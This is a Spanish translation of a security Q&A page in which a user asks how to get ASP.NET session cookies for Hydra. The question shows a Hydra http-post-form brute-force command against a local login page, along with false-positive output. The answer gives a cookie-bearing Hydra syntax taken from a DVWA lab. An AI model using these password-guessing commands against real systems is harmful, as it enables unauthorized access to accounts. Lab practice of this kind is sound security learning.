cómo obtener cookies del sitio aspx para usarlas con la hidra

Navega tus respuestas
4

He estado jugando con el sitio de Hydra y .aspx y he tenido algunos inconvenientes: Hydra responde y me dice que las primeras 16 contraseñas de mi lista de contraseñas son correctas cuando ninguna de ellas lo es. p>

Sintaxis: 

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Salida 

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] host: 192.168.88.196   login: admin   password: adrian

[80][www-form] host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] host: 192.168.88.196   login: admin   password: academic

[80][www-form] host: 192.168.88.196   login: admin   password: access

[80][www-form] host: 192.168.88.196   login: admin   password: abc

[80][www-form] host: 192.168.88.196   login: admin   password: admin

[80][www-form] host: 192.168.88.196   login: admin   password: academia

[80][www-form] host: 192.168.88.196   login: admin   password: albatross

[80][www-form] host: 192.168.88.196   login: admin   password: alex

[80][www-form] host: 192.168.88.196   login: admin   password: airplane

[80][www-form] host: 192.168.88.196   login: admin   password: albany

[80][www-form] host: 192.168.88.196   login: admin   password: ada

[80][www-form] host: 192.168.88.196   login: admin   password: aaa

[80][www-form] host: 192.168.88.196   login: admin   password: albert

[80][www-form] host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

He leído que podemos agregar cookies a Hydra ok: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"

  1. ¿Cómo obtiene las cookies de aspx?
  2. ¿Cómo se lo proporcionas a la hidra?
pregunta user3306821 17.05.2015 - 12:09
fuente

1 respuesta

4

Use un complemento del navegador como Cookies Manager Plus en Firefox luego, simplemente puede copiar el valor en el portapapeles.

Como usted dice, simplemente pegue el valor en la línea de comando para Hydra.

Vea mi respuesta aquí para conocer la sintaxis que funcionó para mí. 

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Entonces, en lugar de PHPSESSID y el valor, incluya el nombre y el valor de la sesión de ASP.NET.

    
respondido por el SilverlightFox 17.05.2015 - 19:38
fuente

Lea otras preguntas en las etiquetas

¿Cómo habilito la compatibilidad con la Sintaxis criptográfica de mensajes (CMS) en OpenSSL en OS X? ¿Por qué hay un hash firmado en la solicitud de certificado (archivo .csr)?